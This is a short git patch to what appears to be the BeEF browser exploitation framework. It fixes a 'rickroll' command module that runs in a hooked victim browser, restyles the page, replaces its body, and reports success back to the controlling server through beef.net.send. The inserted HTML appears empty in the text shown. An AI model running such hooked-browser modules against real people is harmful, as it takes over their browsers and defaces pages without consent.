From 07a911b3c3d86cdad68dd0f09a200f06386b3c59 Mon Sep 17 00:00:00 2001 From: Ven0mSnake Date: Fri, 2 Nov 2018 16:40:29 +0100 Subject: [PATCH] RickRoll module fix --- modules/browser/hooked_domain/rickroll/command.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/browser/hooked_domain/rickroll/command.js b/modules/browser/hooked_domain/rickroll/command.js index 858f24cb7..84b74131e 100644 --- a/modules/browser/hooked_domain/rickroll/command.js +++ b/modules/browser/hooked_domain/rickroll/command.js @@ -10,6 +10,6 @@ beef.execute(function() { $j('body').css({'padding':'0px', 'margin':'0px', 'height':'100%'}); $j('html').css({'padding':'0px', 'margin':'0px', 'height':'100%'}); - $j('body').html(''); + $j('body').html(''); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Rickroll Successful"); });